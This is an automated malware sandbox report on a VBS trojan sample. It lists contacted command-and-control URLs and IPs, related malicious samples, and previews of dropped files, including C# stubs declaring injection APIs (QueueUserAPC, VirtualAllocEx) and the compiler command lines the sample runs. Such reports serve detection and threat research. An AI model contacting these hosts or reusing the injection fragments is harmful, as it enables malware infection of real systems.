http://art.microsoftsofymicrosoftsoft.at/fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r | true | Avira URL Cloud: safe | unknown
http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu | true | Avira URL Cloud: malware | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                  Contacted IPs


                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.251.90.253 | art.microsoftsofymicrosoftsoft.at | Russian Federation | 35278 | SPRINTHOSTRU | true

                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 480986
Start date: 10.09.2021
Start time: 06:58:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: start[526268].vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winVBS@17/16@6/1
EGA Information: Failed
                                  HDC Information:
                                  • Successful, ratio: 96.5% (good quality ratio 92.1%)
                                  • Quality average: 80%
                                  • Quality standard deviation: 29.1%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 21
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .vbs
                                  • Override analysis time to 240s for JS/VBS files not yet terminated
                                  Warnings:
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.54.110.249
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

Time | Type | Description
07:01:45 | API Interceptor | 1x Sleep call for process: wscript.exe modified
07:02:18 | API Interceptor | 3x Sleep call for process: rundll32.exe modified
07:02:28 | API Interceptor | 44x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

Match | Associated Sample Name / URL | Detection
185.251.90.253 | URS8.VBS | malicious
185.251.90.253 | documentation_446618.vbs | malicious
185.251.90.253 | start_information[754877].vbs | malicious
185.251.90.253 | start[873316].vbs | malicious
185.251.90.253 | documentation[979729].vbs | malicious
185.251.90.253 | run_documentation[820479].vbs | malicious
185.251.90.253 | run[476167].vbs | malicious
185.251.90.253 | run_presentation[645872].vbs | malicious
185.251.90.253 | documentation[979729].vbs | malicious

                                                    Domains

Match | Associated Sample Name / URL | Detection | Context (IP)
resolver1.opendns.com | documentation_446618.vbs | malicious | 208.67.222.222
resolver1.opendns.com | start[873316].vbs | malicious | 208.67.222.222
resolver1.opendns.com | 6bI5jJ1oIXeI.vbs | malicious | 208.67.222.222
resolver1.opendns.com | nostalgia.dll | malicious | 208.67.222.222
resolver1.opendns.com | Lbh0K9szYgv5.vbs | malicious | 208.67.222.222
resolver1.opendns.com | ursi.vbs | malicious | 208.67.222.222
resolver1.opendns.com | OcEyzBswGm.exe | malicious | 208.67.222.222
resolver1.opendns.com | u0So5MG5rkxx.vbs | malicious | 208.67.222.222
resolver1.opendns.com | PIfkvZ5Gh6PO.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Ry1j2eCohwtN.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Invoice778465.xlsb | malicious | 208.67.222.222
resolver1.opendns.com | 9uHDrMnFYKhh.vbs | malicious | 208.67.222.222
resolver1.opendns.com | ursnif.vbs | malicious | 208.67.222.222
resolver1.opendns.com | 8ph6zaHVzRpV.vbs | malicious | 208.67.222.222
resolver1.opendns.com | Cetu9U5nJ7Fc.vbs | malicious | 208.67.222.222
resolver1.opendns.com | vntfeq.dll | malicious | 208.67.222.222
resolver1.opendns.com | 231231232.dll | malicious | 208.67.222.222
resolver1.opendns.com | gbgr.dll | malicious | 208.67.222.222
resolver1.opendns.com | B9C23PuJnfNI.vbs | malicious | 208.67.222.222
resolver1.opendns.com | payment_verification_99351.vbs | malicious | 208.67.222.222
art.microsoftsofymicrosoftsoft.at | documentation_446618.vbs | malicious | 185.251.90.253
art.microsoftsofymicrosoftsoft.at | start[873316].vbs | malicious | 185.251.90.253
art.microsoftsofymicrosoftsoft.at | 6bI5jJ1oIXeI.vbs | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | nostalgia.dll | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | Lbh0K9szYgv5.vbs | malicious | 194.226.139.129
art.microsoftsofymicrosoftsoft.at | ursi.vbs | malicious | 193.187.173.154
art.microsoftsofymicrosoftsoft.at | u0So5MG5rkxx.vbs | malicious | 193.187.173.154
art.microsoftsofymicrosoftsoft.at | PIfkvZ5Gh6PO.vbs | malicious | 193.187.173.154
art.microsoftsofymicrosoftsoft.at | Ry1j2eCohwtN.vbs | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | Invoice778465.xlsb | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | 9uHDrMnFYKhh.vbs | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | ursnif.vbs | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | 8ph6zaHVzRpV.vbs | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | Cetu9U5nJ7Fc.vbs | malicious | 185.180.231.210
art.microsoftsofymicrosoftsoft.at | vntfeq.dll | malicious | 95.181.163.74
art.microsoftsofymicrosoftsoft.at | 231231232.dll | malicious | 95.181.163.74
art.microsoftsofymicrosoftsoft.at | gbgr.dll | malicious | 95.181.163.74
art.microsoftsofymicrosoftsoft.at | B9C23PuJnfNI.vbs | malicious | 95.181.163.74
art.microsoftsofymicrosoftsoft.at | payment_verification_99351.vbs | malicious | 95.181.163.74
art.microsoftsofymicrosoftsoft.at | invoice_file_20193.vbs | malicious | 95.181.179.92

                                                    ASN

                                                    Match  Associated Sample Name / URL  Detection  Context
                                                    SPRINTHOSTRU  ZaRfpqeOYY.apk  malicious  141.8.192.169
                                                    SPRINTHOSTRU  URS8.VBS  malicious  185.251.90.253
                                                    SPRINTHOSTRU  h4AjR43abb.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  documentation_446618.vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  start_information[754877].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  dAmDdz0YVv.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  start[873316].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  documentation[979729].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  run_documentation[820479].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  run[476167].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  run_presentation[645872].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  yXf9mhlpKV.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  mgdL2TD6Dg.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  documentation[979729].vbs  malicious  185.251.90.253
                                                    SPRINTHOSTRU  Pi2KyLAg44.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  oClF50dZRG.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  2K5KXrsoLH.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  1fbm3cYMWh.exe  malicious  185.251.88.208
                                                    SPRINTHOSTRU  SecuriteInfo.com.PyInstaller.29419.exe  malicious  141.8.197.42
                                                    SPRINTHOSTRU  Yc9We5U5L4.exe  malicious  141.8.193.236

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.9260988789684415
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllulb/lj:NllUb/l
                                                    MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                    SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                    SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                    SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                    Malicious:false
                                                    Preview: @...e................................................@..........
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.0.cs
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):398
                                                    Entropy (8bit):4.993655904789625
                                                    Encrypted:false
                                                    SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                    MD5:C08AF9BD048D4864677C506B609F368E
                                                    SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                    SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                    SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                    Malicious:false
                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.2785904286076155
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fr2SYMws+zxs7+AEszIWXp+N23frN:p37Lvkmb6KHB+WZE85
                                                    MD5:3AB2984207C5CA39AD2DCAD1AC4AA9E5
                                                    SHA1:FC1C2BEFD1BCC1F807622CA0188F674A133950D6
                                                    SHA-256:1A5C31EFECA3A9214894B012D7CE692DF37C648944C0941959C63EA46F31B566
                                                    SHA-512:D8082CE1F6CB54828C1F31CC7C2A26E59B19F8BC2B52E2C140E20385EB79D18A3DC274900424D96831BA593E886E5808744D7394F52F2A337FEA1F5DC9CE963D
                                                    Malicious:true
                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.0.cs"
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3584
                                                    Entropy (8bit):2.592495678372235
                                                    Encrypted:false
                                                    SSDEEP:24:etGS4/u2Dg85lxlok3JgpiaCa4MatkZf0RaUI+ycuZhNQakSsPNnq:6pWb5lxF1aCSJ0J1ulQa38q
                                                    MD5:6B48B801F9F28023FBCB27DFF09E67D9
                                                    SHA1:022B840615E4B9F779F8651E5C1709E21F9726F1
                                                    SHA-256:8ABFBD9D3ED37B23C005C69520A05B13D120D34F3756887255AB4335E27349F6
                                                    SHA-512:9294111197351289764A42E246E7EA92D50BCB159E173DC9B81ED0AE23448D98C91383AC57341B8604C4CA19B0C57EAD432AF568D44D54D14C6D9C6B473F5F5A
                                                    Malicious:false
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ye;a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.1cv1ijms.dll.stkml.W32.mscorlib.Sy
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.out
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):412
                                                    Entropy (8bit):4.871364761010112
                                                    Encrypted:false
                                                    SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                    MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                    SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                    SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                    SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                    Malicious:false
                                                    Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    C:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.10744871627024
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
                                                    MD5:8D57783B20B153F231665683B2AB28BD
                                                    SHA1:848F359031382274CE273F9101163CF11C4CE29B
                                                    SHA-256:F2ECDB9A00574B4082B10E323E57CD1B68C403D1F0A1588B2C4C842F64ABE5E5
                                                    SHA-512:DEBC69E8A64B69BA4A3718985677E972AD7CAB4E2C645283DAF26AC67BF41F5BF101FD1A91AD928ED61018EEB470E9DE5EAD2FA55B2C6D0730435BC30E6E2D19
                                                    Malicious:false
                                                    Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.c.v.1.i.j.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.c.v.1.i.j.m.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                    C:\Users\user\AppData\Local\Temp\RESFECC.tmp
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2184
                                                    Entropy (8bit):2.702642323022324
                                                    Encrypted:false
                                                    SSDEEP:24:pgZfpXhHGhKdNNI+ycuZhNQakSsPNnq9qp7e9Ep:KDxcKd31ulQa38q9Y
                                                    MD5:0E8427BDB83046818F9375BEC80FE27B
                                                    SHA1:619BDA194FAF92D4813C29D9CFE00D2E7C1A8754
                                                    SHA-256:AD03CFA40FC2E7E25137FE3DAFA4F47438AC97DF0F5A67F3B1235E764465CBC9
                                                    SHA-512:CFD17472042885A90FE3B8FBD24D1CF21B84A75E1C67956F6B130B1764452F3E7BD288108C354AB1A872E2D637BDCA27D2A33F23974DEECE1B4BAAA21D2C2213
                                                    Malicious:false
                                                    Preview: ........T....c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP................Wx; .S.1fV...(...........4.......C:\Users\user\AppData\Local\Temp\RESFECC.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b51iw0xu.4zo.ps1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upl555bt.hac.psm1
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\adobe.url
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):108
                                                    Entropy (8bit):4.699454908123665
                                                    Encrypted:false
                                                    SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                    MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                    SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                    SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                    SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                    Malicious:false
                                                    Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                    C:\Users\user\AppData\Local\Temp\fum.cpp
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):387072
                                                    Entropy (8bit):6.617827225958404
                                                    Encrypted:false
                                                    SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                                    MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                                    SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                                    SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                                    SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                                    Malicious:true
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):421
                                                    Entropy (8bit):5.017019370437066
                                                    Encrypted:false
                                                    SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                    MD5:7504862525C83E379C573A3C2BB810C6
                                                    SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                    SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                    SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                    Malicious:true
                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.cmdline
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.316801060470633
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVdndVH0zxs7+AEszIWXp+N23fVdJ:p37Lvkmb6KHPUWZE8JH
                                                    MD5:E984F490D4C2063ADC7968661E7CF282
                                                    SHA1:04103B456043B9D0B229C10538B0B0D993E597A9
                                                    SHA-256:45A08E1907D96F4A4A0AD6F751E7498FA62B72999D263DF4F08028F06E7B447E
                                                    SHA-512:706D4A06D0021EA9C82F02A4D62829228F9E2B9C56D184F906D6EC1562F4491A5039BA9AB27AAAE4A056D8531122AE9D02C08C0BED8162D71D8285217080AB7F
                                                    Malicious:false
                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs"
                                                    C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.out
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):454
                                                    Entropy (8bit):5.426901270421163
                                                    Encrypted:false
                                                    SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVdndVH0zxs7+AEz:xKIR37Lvkmb6KHPUWZE8Je
                                                    MD5:4336DDE59BD6F51034DF5F9C77845261
                                                    SHA1:01591543B59D6353AB7FAB8392868A12D3A5D570
                                                    SHA-256:A3E7D0FE9E5C5BD9F5585E52F47C6012105ACF061151AE765132A7F9836D5620
                                                    SHA-512:1E98FDFEC2DCEB0B99ACC0E02338365E2E3FCD53EC3692E393D2BF8366B616EAB2B86ABFE75CAC552E5BFE75576F3AAD07DF12C1DC32E3E923A97CEBC90AC911
                                                    Malicious:false
